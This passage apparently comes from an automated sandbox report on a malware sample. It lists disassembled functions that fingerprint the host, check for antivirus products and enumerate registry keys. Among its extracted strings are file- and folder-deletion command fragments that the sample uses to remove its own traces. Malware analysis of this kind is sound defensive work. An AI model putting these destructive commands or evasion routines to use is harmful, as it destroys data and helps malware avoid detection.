                                                                                                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00FF1BE1
                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(01011F18,00000000,00000001,01011E48,?), ref: 00FF1BFB
                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00FF1C31
                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00FF1C80
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1F65: LocalAlloc.KERNEL32(00000040,00000005,?,?,00FF1CA3,?), ref: 00FF1F6D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1F65: CharToOemW.USER32(?,00000000), ref: 00FF1F79
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00FF1CAE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                          • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                          • API String ID: 4288110179-315474579
                                                                                                                                                                                                                                                          • Opcode ID: 06eff91273f578cd1326b06d9ab9c0885f113232a28aa466600e16e6d4616dd1
                                                                                                                                                                                                                                                          • Instruction ID: a544237a80ca2592c7d6970ab5ac31887c751c654d44e474c46d893186084d81
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06eff91273f578cd1326b06d9ab9c0885f113232a28aa466600e16e6d4616dd1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86311E75A40209BBDB21DB96CC49EEFBB7DFFC6B10F10410DF651AA2A4C6755901DB20
                                                                                                                                                                                                                                                          Function 00FE1274 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1532 fe1274-fe1370 call 10036b0 * 2 lstrcatA * 13 call ff0ea8 1538 fe1375-fe1379 1532->1538 1539 fe137b-fe137d 1538->1539 1540 fe1395-fe1397 1538->1540 1541 fe137f-fe1385 1539->1541 1542 fe1391-fe1393 1539->1542 1543 fe139a-fe139c 1540->1543 1541->1540 1544 fe1387-fe138f 1541->1544 1542->1543 1545 fe139e-fe13a4 call ff0e76 1543->1545 1546 fe13d9-fe13e5 call ffcab4 1543->1546 1544->1538 1544->1542 1550 fe13a9-fe13ad 1545->1550 1551 fe13af-fe13b1 1550->1551 1552 fe13c9-fe13cb 1550->1552 1554 fe13c5-fe13c7 1551->1554 1555 fe13b3-fe13b9 1551->1555 1553 fe13ce-fe13d0 1552->1553 1553->1546 1557 fe13d2-fe13d3 ExitProcess 1553->1557 1554->1553 1555->1552 1556 fe13bb-fe13c3 1555->1556 1556->1550 1556->1554
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE1297
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE12A6
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019A90), ref: 00FE12C0
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019A94), ref: 00FE12CE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019A98), ref: 00FE12DC
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019A9C), ref: 00FE12EA
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019AA0), ref: 00FE12F8
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019AA4), ref: 00FE1306
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019AA8), ref: 00FE1314
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019AAC), ref: 00FE1322
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019AB0), ref: 00FE1330
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019AB4), ref: 00FE133E
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019AB8), ref: 00FE134C
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019ABC), ref: 00FE135A
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01019AC0), ref: 00FE1368
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0EA8: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE1375), ref: 00FF0EB4
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0EA8: HeapAlloc.KERNEL32(00000000,?,?,?,00FE1375), ref: 00FF0EBB
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0EA8: GetComputerNameA.KERNEL32(00000000,00FE1375), ref: 00FF0ECF
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00FE13D3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1553874529-0
                                                                                                                                                                                                                                                          • Opcode ID: 4d96e3579ef077f2a48d4d854304455f48eed54728cda688fb4e3f278c1e900a
                                                                                                                                                                                                                                                          • Instruction ID: a9b32a7158535590fe86271f900f5eb602953c02769bd7b4b68722ab14ea6071
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d96e3579ef077f2a48d4d854304455f48eed54728cda688fb4e3f278c1e900a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F41C5B2D0426C6BCF20DBB28C19EDB7FACAF15324F904591E5D9E7005D7789A88CB90
                                                                                                                                                                                                                                                          Function 00FF1426 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,010157BB,00000000,?,?), ref: 00FF1496
                                                                                                                                                                                                                                                          • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00FF14D3
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF1500
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00FF151F
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00FF1555
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF156A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,01015DBC), ref: 00FF15FF
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00FF1669
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00FF1689
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00FF1695
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                                                                                          • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                          • API String ID: 2394436309-3278919252
                                                                                                                                                                                                                                                          • Opcode ID: 766d18cfba8e1b00062d8d4768ca6093c6858653cc487cc37881fae9500e0e6f
                                                                                                                                                                                                                                                          • Instruction ID: d418dde6cdb1271931e9cac1ddf5416bdd4f0cb04efa6e403ef8737f87b23b76
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 766d18cfba8e1b00062d8d4768ca6093c6858653cc487cc37881fae9500e0e6f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9461D87590012C9BEB20DB25DD84EEEB7B9FF45300F5086D6A608A2122DF746F85DF90
                                                                                                                                                                                                                                                          Function 00FF7CF3 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF7D18
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF7D27
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00FF7D3C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 00FF7ED8
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF7EE7
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF7EF9
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00FF7F09
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • " & exit, xrefs: 00FF7E5C
                                                                                                                                                                                                                                                          • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00FF7E12
                                                                                                                                                                                                                                                          • " & exit, xrefs: 00FF7E0B
                                                                                                                                                                                                                                                          • " & rd /s /q "C:\ProgramData\, xrefs: 00FF7DB5
                                                                                                                                                                                                                                                          • /c timeout /t 10 & del /f /q ", xrefs: 00FF7D67
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                                                                          • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                                                                                          • API String ID: 2823247455-1079830800
                                                                                                                                                                                                                                                          • Opcode ID: 039fae708bdccba0e5c8b9d7e5ddf4ef5139de7ca635361243f9f2f7a3713c12
                                                                                                                                                                                                                                                          • Instruction ID: f3172389901d1d8154ea987568777118bb8bc8cbebd6c776bdcdc3b3935c1027
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 039fae708bdccba0e5c8b9d7e5ddf4ef5139de7ca635361243f9f2f7a3713c12
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7151C5B2D4026E9BCB61EF25CC81AADB37CAF44704F4101E5A708B7122DB746F869F84
                                                                                                                                                                                                                                                          Function 00FF0BC5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 110memorystringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 00FF0BF8
                                                                                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FF0C38
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00FF0C8D
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00FF0C94
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF0CCA
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,01015D6C), ref: 00FF0CD9
                                                                                                                                                                                                                                                            • Part of subcall function 00FF18A7: GetCurrentHwProfileA.ADVAPI32(?), ref: 00FF18C2
                                                                                                                                                                                                                                                            • Part of subcall function 00FF18A7: _memset.LIBCMT ref: 00FF18F1
                                                                                                                                                                                                                                                            • Part of subcall function 00FF18A7: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00FF1919
                                                                                                                                                                                                                                                            • Part of subcall function 00FF18A7: lstrcatA.KERNEL32(?,01015DFC,?,?,?,?,?), ref: 00FF1936
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF0CF0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF27A7: malloc.MSVCRT ref: 00FF27AC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF27A7: strncpy.MSVCRT ref: 00FF27BD
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 00FF0D13
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
